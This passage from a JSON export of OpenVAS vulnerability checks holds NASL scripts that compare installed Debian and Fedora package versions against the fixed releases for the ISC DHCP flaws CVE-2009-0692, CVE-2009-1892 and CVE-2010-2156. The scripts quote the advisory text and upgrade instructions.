isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:25", "description": "The remote host is missing an update to dhcp3\nannounced via advisory DSA 1833-2.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1833-2 (dhcp3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064756", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064756", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1833_2.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1833-2 (dhcp3)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The previous dhcp3 update (DSA-1833-1) did not properly apply the\nrequired changes to the stable (lenny) version. The old stable (etch)\nversion is not affected by this problem.\n\nThe original advisory description follows.\n\nSeveral remote vulnerabilities have been discovered in ISC's DHCP\nimplementation:\n\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution. (CVE-2009-0692)\n\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using dhcp-client-identifier\nand hardware ethernet. This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap. (CVE-2009-1892)\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny3.\n\nWe recommend that you upgrade your dhcp3 packages.\";\ntag_summary = \"The remote host is missing an update to dhcp3\nannounced via advisory DSA 1833-2.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201833-2\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64756\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1833-2 (dhcp3)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-6+lenny3\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:53", "description": "The remote host is missing an update to dhcp\nannounced via advisory FEDORA-2009-8344.", "cvss3": {}, "published": "2009-09-02T00:00:00", "type": "openvas", "title": "Fedora Core 10 FEDORA-2009-8344 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064735", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064735", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_8344.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-8344 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nThis update to the dhcp package includes fixes for CVE-2009-0692 and\nCVE-2009-1892.\n\nNote: CVE-2009-0692 had no security consequences on Fedora, thanks\nto the use of FORTIFY_SOURCE\n\nChangeLog:\n\n* Wed Aug 5 2009 David Cantrell - 12:4.0.0-37\n- Fix for CVE-2009-0692\n- Fix for CVE-2009-1892 (#511834)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update dhcp' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-8344\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory FEDORA-2009-8344.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64735\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-09-02 04:58:39 +0200 (Wed, 02 Sep 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 10 FEDORA-2009-8344 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511834\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdhcp4client\", rpm:\"libdhcp4client~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"libdhcp4client-devel\", rpm:\"libdhcp4client-devel~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~4.0.0~37.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:44", "description": "The remote host is missing an update to dhcp3\nannounced via advisory DSA 1833-1.", "cvss3": {}, "published": "2009-07-29T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 1833-1 (dhcp3)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231064421", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064421", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1833_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1833-1 (dhcp3)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in ISC's DHCP\nimplementation:\n\nIt was discovered that dhclient does not properly handle overlong\nsubnet mask options, leading to a stack-based buffer overflow and\npossible arbitrary code execution. (CVE-2009-0692)\n\nChristoph Biedl discovered that the DHCP server may terminate when\nreceiving certain well-formed DHCP requests, provided that the server\nconfiguration mixes host definitions using dhcp-client-identifier\nand hardware ethernet. This vulnerability only affects the lenny\nversions of dhcp3-server and dhcp3-server-ldap. (CVE-2009-1892)\n\nFor the old stable distribution (etch), these problems have been fixed\nin version 3.0.4-13+etch2.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 3.1.1-6+lenny2.\n\nFor the unstable distribution (sid), these problems will be fixed\nsoon.\n\nWe recommend that you upgrade your dhcp3 packages.\";\ntag_summary = \"The remote host is missing an update to dhcp3\nannounced via advisory DSA 1833-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201833-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64421\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-07-29 19:28:37 +0200 (Wed, 29 Jul 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1833-1 (dhcp3)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.0.4-13+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp-client\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-dev\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-server-ldap\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-relay\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-client\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"dhcp3-common\", ver:\"3.1.1-6+lenny2\", rls:\"DEB5.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:26", "description": "The remote host is missing an update to dhcp\nannounced via advisory FEDORA-2009-9075.", "cvss3": {}, "published": "2009-11-17T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-9075 (dhcp)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:136141256231066252", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066252", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_9075.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-9075 (dhcp)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nDo not require policycoreutils when installing dhcp or dhclient packages. If\nyou have the package installed, the /sbin/restorecon program will be used by\ndhclient-script and the dhcpd init script. This update to the dhcp package\nincludes fixes for CVE-2009-0692 and CVE-2009-1892.\nNote: CVE-2009-0692 had no security consequences on Fedora, thanks to the\nuse of FORTIFY_SOURCE\n\nChangeLog:\n\n* Wed Aug 26 2009 David Cantrell - 12:4.1.0p1-4\n- Do not require policycoreutils for dhclient subpackage, fix restorecon\ncalls in postinstall scriptlets (#519479)\n* Wed Aug 26 2009 David Cantrell - 12:4.1.0p1-3\n- Do not require policycoreutils for post scriptlet (#519479)\n* Thu Aug 6 2009 David Cantrell - 12:4.1.0p1-2\n- Add /usr/lib[64]/pm-utils/sleep.d/56dhclient to handle suspend and\nresume with active dhclient leases (#479639)\n* Wed Aug 5 2009 David Cantrell - 12:4.1.0p1-1\n- Upgrade to dhcp-4.1.0p1, which is the official upstream release to fix\nCVE-2009-0692\n* Wed Aug 5 2009 David Cantrell - 12:4.1.0-25\n- Fix for CVE-2009-0692\n- Fix for CVE-2009-1892 (#511834)\n- Disable patch for #514828 since that fix is still in updates-testing\n* Tue Aug 4 2009 David Cantrell - 12:4.1.0-24\n- Correct lease file format written by dhclient (#514828)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update dhcp' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-9075\";\ntag_summary = \"The remote host is missing an update to dhcp\nannounced via advisory FEDORA-2009-9075.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66252\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-17 21:42:12 +0100 (Tue, 17 Nov 2009)\");\n script_cve_id(\"CVE-2009-0692\", \"CVE-2009-1892\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-9075 (dhcp)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=519479\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511834\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~4.1.0p1~4.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.0p1~4.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.0p1~4.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~4.1.0p1~4.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-21T11:33:15", "description": "Check for the Version of dhcp", "cvss3": {}, "published": "2010-06-25T00:00:00", "type": "openvas", "title": "Fedora Update for dhcp FEDORA-2010-10083", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692", "CVE-2010-2156"], "modified": "2017-12-21T00:00:00", "id": "OPENVAS:862173", "href": "http://plugins.openvas.org/nasl.php?oid=862173", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dhcp FEDORA-2010-10083\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"DHCP (Dynamic Host Configuration Protocol) is a protocol which allows\n individual devices on an IP network to get their own network\n configuration information (IP address, subnetmask, broadcast address,\n etc.) from a DHCP server. The overall purpose of DHCP is to make it\n easier to administer a large network. The dhcp package includes the\n ISC DHCP service and relay agent.\n\n To use DHCP on your network, install a DHCP service (or relay agent),\n and on clients run a DHCP client daemon. The dhcp package provides\n the ISC DHCP service and relay agent.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"dhcp on Fedora 11\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043344.html\");\n script_id(862173);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-25 12:25:26 +0200 (Fri, 25 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-10083\");\n script_cve_id(\"CVE-2010-2156\", \"CVE-2009-0692\", \"CVE-2009-1892\");\n script_name(\"Fedora Update for dhcp FEDORA-2010-10083\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dhcp\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.0p1~6.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:13", "description": "Check for the Version of dhcp", "cvss3": {}, "published": "2010-06-25T00:00:00", "type": "openvas", "title": "Fedora Update for dhcp FEDORA-2010-10083", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-1892", "CVE-2009-0692", "CVE-2010-2156"], "modified": "2018-01-19T00:00:00", "id": "OPENVAS:1361412562310862173", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310862173", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dhcp FEDORA-2010-10083\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"DHCP (Dynamic Host Configuration Protocol) is a protocol which allows\n individual devices on an IP network to get their own network\n configuration information (IP address, subnetmask, broadcast address,\n etc.) from a DHCP server. The overall purpose of DHCP is to make it\n easier to administer a large network. The dhcp package includes the\n ISC DHCP service and relay agent.\n\n To use DHCP on your network, install a DHCP service (or relay agent),\n and on clients run a DHCP client daemon. The dhcp package provides\n the ISC DHCP service and relay agent.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"dhcp on Fedora 11\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-June/043344.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.862173\");\n script_version(\"$Revision: 8469 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 08:58:21 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-25 12:25:26 +0200 (Fri, 25 Jun 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-10083\");\n script_cve_id(\"CVE-2010-2156\", 